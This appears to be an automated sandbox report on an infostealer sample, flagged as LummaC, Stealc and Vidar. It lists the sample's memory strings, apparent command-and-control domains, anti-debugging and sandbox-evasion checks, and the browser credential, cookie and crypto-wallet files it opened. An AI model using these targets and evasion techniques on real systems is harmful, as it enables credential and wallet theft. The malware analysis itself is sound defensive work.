Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: file.exe, 00000002.00000003.1408531669.00000000054C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: file.exe, 00000002.00000003.1382825840.00000000007FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |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
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: file.exe, 00000002.00000002.1635250870.0000000005470000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareVMware[
Source: file.exe, 00000002.00000002.1635250870.0000000005470000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: file.exe, 00000002.00000002.1633438617.0000000000C3D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000002.00000002.1635972942.0000000005FA1000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
LummaC encrypted strings found
Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: p3ar11fter.sbs
Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 3xp3cts1aim.sbs
Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: peepburry828.sbs
Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: p10tgrace.sbs
Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: processhol.sbs
Source: file.exe, 00000002.00000002.1633438617.0000000000C3D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: file.exe, 00000002.00000002.1635972942.0000000005FA1000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: +N;Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000002.00000003.1485051263.000000000080D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r\MsMpeng.exe
Source: file.exe, 00000002.00000003.1490451305.0000000005480000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1484843360.0000000005480000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1484982784.0000000005482000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1484951157.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1635741412.0000000005BD1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1592515790.00000000080B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000002.00000003.1490671495.00000000007E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletlcE
Source: file.exe, 00000002.00000003.1449584416.00000000007EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
